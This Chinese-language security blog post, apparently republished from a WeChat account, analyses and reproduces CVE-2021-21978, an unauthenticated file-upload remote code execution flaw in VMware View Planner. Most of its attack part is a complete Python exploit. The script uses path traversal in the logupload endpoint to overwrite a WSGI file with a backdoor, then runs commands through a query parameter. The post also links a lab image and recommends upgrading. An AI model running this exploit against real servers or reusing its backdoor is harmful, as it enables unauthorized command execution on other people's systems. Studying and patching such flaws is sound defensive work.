View Planner 的logupload端点缺乏输入验证,导致具有查看View Planner Harness网络访问权限的未经授权的攻击者可以上载和执行精心编制的文件,从而导致在logupload容器中执行远程代码。
VMware View Planner <= 4.6.0
环境地址:
链接: https://pan.baidu.com/s/1fE69BWvjGNaZIuggIhVabg提取码: mxpd
下载后直接导入到虚拟机
最后界面为如下图
EXP地址:
https://github.com/skytina/CVE-2021-21978VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件log_upload_wsgi.py
# -*- coding: utf-8 -*-# @Time : 2021/3/5 下午1:38# @Author : skytina# @File : CVE-2021-21978.pyimport requests,json,sysimport urllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def exploit(url):payload_fname = 'upload.txt'logMetaData = {"itrLogPath":"../../../../../../etc/httpd/html/wsgi_log_upload","logFileType":"log_upload_wsgi.py","workloadID":"2"}vul_path = '/logupload?logMetaData={logMetaData}'.format(logMetaData=json.dumps(logMetaData))# with open('./upload.txt','r') as f:# with open(payload_fname,'w+') as wf:# command_to_execute = "{command} > /etc/httpd/html/logs/.debug.log"# .format(command=command)# content = f.read()# content_w = content.replace(# "{command_to_execute}",command_to_execute# )# wf.write(content_w)req_url = "{url}{vul_path}".format(url = url,vul_path = vul_path)files = {"logfile":open(payload_fname,"r")}try:r = requests.post(req_url,files=files,verify=False)#print(r.content.decode())cmd_r = cmd(url,'echo "NiuNiu2020" |base64')#print(cmd_r)if "Tml1Tml1MjAyMAo=" in str(cmd_r):return Trueelse:return Falseexcept Exception as e:print(str(e))return Falsedef cmd(url,command):cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(url=url,command=command)try:resp = requests.get(cmd_url,verify=False)return resp.content.decode()except Exception as e:return str(e)def usage():help = "[*] python3 CVE-2021-21978.py urlntpython3 CVE-2021-21978.py https://192.168.80.3"print(help)#exploit('https://192.168.80.3','whoami')if __name__ == "__main__":if len(sys.argv) < 2:usage()else:url = sys.argv[1]if url.startswith("http://") or url.startswith("https"):if exploit(url):cmd_url = "{url}/logupload?secert=NiuNiu2020&command={command}".format(url=url,command="command")outmsg = "[*]{url} is vulnerablen[*]You can execute command like This: {cmd_url}".format(url = url,cmd_url=cmd_url)print(outmsg)else:usage()
可以看到apache 配置文件配置了logupload端点的指向文件为
/etc/httpd/html/wsgi_log_upload/log_upload_wsgi.py
其路径/etc/httpd/html/ 实际是容器内的路径,对应宿主机的/root/viewplanner/httpd
定位到
/root/viewplanner/httpd/wsgi_log_upload/log_upload_wsgi.py文件
由于缺少路径规范过滤,只需要稍微构造一下数据包即可上传恶意文件到任意路径,从而可以覆盖log_upload_wsgi.py 文件,达到远程代码执行的效果
升级到最新版本。
参考链接:
https://paper.seebug.org/1495/
https://github.com/skytina/CVE-2021-21978
https://mp.weixin.qq.com/s/mBL9kYptreo62g4IonXSLg
本文始发于微信公众号(Timeline Sec):CVE-2021-21978:VM View Planner RCE分析复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论